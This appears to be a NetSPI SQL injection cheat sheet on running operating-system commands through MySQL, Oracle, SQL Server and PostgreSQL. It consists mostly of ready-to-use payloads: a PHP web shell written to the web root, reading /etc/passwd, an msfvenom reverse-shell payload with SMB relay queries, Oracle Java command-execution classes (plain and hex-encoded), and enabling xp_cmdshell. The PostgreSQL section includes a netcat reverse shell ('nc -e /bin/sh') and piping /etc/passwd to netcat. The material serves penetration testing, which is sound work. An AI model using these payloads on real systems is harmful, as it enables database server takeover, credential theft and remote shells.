Executing OS Commands Through MySQL
Running OS commands is one of the primary objectives of SQL injection - this aids in getting full control of the host OS. This may happen by directly executing commands, modifying existing data to put a shell on a webpage, or exploiting hidden functionality in the database.
| Description | Query |
|---|---|
| Command Execution (PHP) | SELECT "<? echo passthru($_GET['cmd']); ?>" INTO OUTFILE '/var/www/shell.php' |
| Command Execution with MySQL CLI Access | https://infamoussyn.wordpress.com/2014/07/11/gaining-a-root-shell-using-mysql-user-defined-functions-and-setuid-binaries/ |
| Traversing directories (Linux) | SELECT load_file("/etc/passwd") from information_schema |
SMB Relay Shell
Requires
* Metasploit
* smbrelayx
Generate the reverse shell payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=YOUR.IP.GOES.HERE LPORT=443 -f exe > reverse_shell.exe
Generate a listener to deliver the reverse shell
smbrelayx.py -h VICTIM.IP.GOES.HERE -e ./reverse_shell.exe
Execute any one of the MySQL queries below to call the listener
select load_file('\\\\YOUR.IP.GOES.HERE\\aa');
select load_file(0x5c5c5c5c3139322e3136382e302e3130315c5c6161);
select 'netspi' into dumpfile '\\\\YOUR.IP.GOES.HERE\\aa';
select 'netspi' into outfile '\\\\YOUR.IP.GOES.HERE\\aa';
load data infile '\\\\YOUR.IP.GOES.HERE\\aa' into table database.table_name;
For more information see here
Executing OS Commands Through Oracle
Running OS commands is one of the primary objectives of SQL injection - this aids in getting full control of the host OS. This may happen by directly executing commands, modifying existing data to put a shell on a webpage, or exploiting hidden functionality in the database.
Java can be used to execute commands if it's installed.
| Description | Query |
|---|---|
| Creating Java Classes |
/* create Java class */ BEGIN EXECUTE IMMEDIATE 'create or replace and compile java source named "PwnUtil" as import java.io.*; public class PwnUtil{ public static String runCmd(String args){ try{ BufferedReader myReader = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(args).getInputStream()));String stemp, str = "";while ((stemp = myReader.readLine()) != null) str += stemp + "\n";myReader.close();return str;} catch (Exception e){ return e.toString();}} public static String readFile(String filename){ try{ BufferedReader myReader = new BufferedReader(new FileReader(filename));String stemp, str = "";while((stemp = myReader.readLine()) != null) str += stemp + "\n";myReader.close();return str;} catch (Exception e){ return e.toString();}}};'; END; / BEGIN EXECUTE IMMEDIATE 'create or replace function PwnUtilFunc(p_cmd in varchar2) return varchar2 as language java name ''PwnUtil.runCmd(java.lang.String) return String'';'; END; / /* run OS command */ SELECT PwnUtilFunc('ping -c 4 localhost') FROM dual; |
| Creating Java Classes (Hex encoded) |
/* create Java class */ SELECT TO_CHAR(dbms_xmlquery.getxml('declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate utl_raw.cast_to_varchar2(hextoraw(''637265617465206f72207265706c61636520616e6420636f6d70696c65206a61766120736f75726365206e616d6564202270776e7574696c2220617320696d706f7274206a6176612e696f2e2a3b7075626c696320636c6173732070776e7574696c7b7075626c69632073746174696320537472696e672072756e28537472696e672061726773297b7472797b4275666665726564526561646572206d726561643d6e6577204275666665726564526561646572286e657720496e70757453747265616d5265616465722852756e74696d652e67657452756e74696d6528292e657865632861726773292e676574496e70757453747265616d282929293b20537472696e67207374656d702c207374723d22223b207768696c6528287374656d703d6d726561642e726561644c696e6528292920213d6e756c6c29207374722b3d7374656d702b225c6e223b206d726561642e636c6f736528293b2072657475726e207374723b7d636174636828457863657074696f6e2065297b72657475726e20652e746f537472696e6728293b7d7d7d'')); EXECUTE IMMEDIATE utl_raw.cast_to_varchar2(hextoraw(''637265617465206f72207265706c6163652066756e6374696f6e2050776e5574696c46756e6328705f636d6420696e207661726368617232292072657475726e207661726368617232206173206c616e6775616765206a617661206e616d65202770776e7574696c2e72756e286a6176612e6c616e672e537472696e67292072657475726e20537472696e67273b'')); end;')) results FROM dual /* run OS command */ SELECT PwnUtilFunc('ping -c 4 localhost') FROM dual; |
Executing OS Commands Through SQL Server
Running OS commands is one of the primary objectives of SQL injection - this aids in getting full control of the host OS. This may happen by directly executing commands, modifying existing data to put a shell on a webpage, or exploiting hidden functionality in the database.
| Name | Query |
|---|---|
| xp_cmdshell | -- Enable show advanced options sp_configure 'show advanced options', 1 RECONFIGURE GO -- Enable xp_cmdshell sp_configure 'xp_cmdshell', 1 RECONFIGURE GO EXEC xp_cmdshell 'net user' |
| Write to registry autorun | https://blog.netspi.com/establishing-registry-persistence-via-sql-server-powerupsql/ https://gist.github.com/nullbind/03af8d671621a6e1cef770bace19a49e |
| Write to file autorun | https://blog.netspi.com/how-to-hack-database-links-in-sql-server/ |
| Agent Jobs | https://www.optiv.com/blog/mssql-agent-jobs-for-command-execution |
| SQL Injection in stored procedures | https://blog.netspi.com/hacking-sql-server-stored-procedures-part-3-sqli-and-user-impersonation/ |
| CLR Assembly | https://blog.netspi.com/attacking-sql-server-clr-assemblies/ |
| Custom Extended Stored Procedure | https://github.com/NetSPI/PowerUpSQL/blob/master/templates/cmd_exec.cpp |
TSQL
Executing OS Commands Through PostgreSQL
Running OS commands is one of the primary objectives of SQL injection - this aids in getting full control of the host OS. This may happen by directly executing commands, modifying existing data to put a shell on a webpage, or exploiting hidden functionality in the database.
| Name | Query |
|---|---|
|
FROM PROGRAM |
DROP TABLE IF EXISTS myoutput; CREATE TABLE myoutput(filename text); COPY myoutput FROM PROGRAM 'ps aux'; SELECT * FROM myoutput ORDER BY filename ASC; |
|
Create PostgreSQL Function Mapped to Libc System Method |
CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT; SELECT system('cat /etc/passwd | nc Notes: This method works with PostgreSQL 8.1 and below. After version 9, you'll have to upload your own library with the "PG_MODULE_MAGIC" set. The process for this is outlined at https://www.dionach.com/blog/postgresql-9x-remote-command-execution, below is a summary. 1. To get the version from the PostgreSQL server use the query below. SELECT version(); 2. To compile the library, a Linux machine with the same version of PostgreSQL as the target machine is required. Below is an example showing how to install PostgreSQL. apt install postgresql postgresql-server-dev-9.6 3. Download pgexec file from https://github.com/Dionach/pgexec/tree/master. 4. Compile pgexec with the command below. gcc -I$(/usr/local/pgsql/bin/pg_config --includedir-server) -shared -fPIC -o pg_exec.so pg_exec.c 5. Upload the library to the target system. First split the file into pieces. split -b 2048 pg_exec.so 6. The file can then be written to disk through PostgreSQL using the commands below. SELECT lo_creat(-1); set c0 `base64 -w 0 xaa` INSERT INTO pg_largeobject (loid, pageno, data) values (16388, 0, decode(:'c0', 'base64')); Then repeat for each piece of the file. 7. Create the function. CREATE FUNCTION sys(cstring) RETURNS int AS '/tmp/pg_exec.so', 'pg_exec' LANGUAGE 'c' STRICT; 8. Send a reverse shell to your system. SELECT sys('nc -e /bin/sh 10.0.0.1 4444'); Source: https://www.dionach.com/blog/postgresql-9x-remote-command-execution |
|
Metasploit postgres_payload Module This can be used with direct connections. |
https://www.rapid7.com/db/modules/exploit/linux/postgres/postgres_payload exploit/linux/postgres/postgres_payload |
© 2023 Copyright by NetSPI. All rights reserved.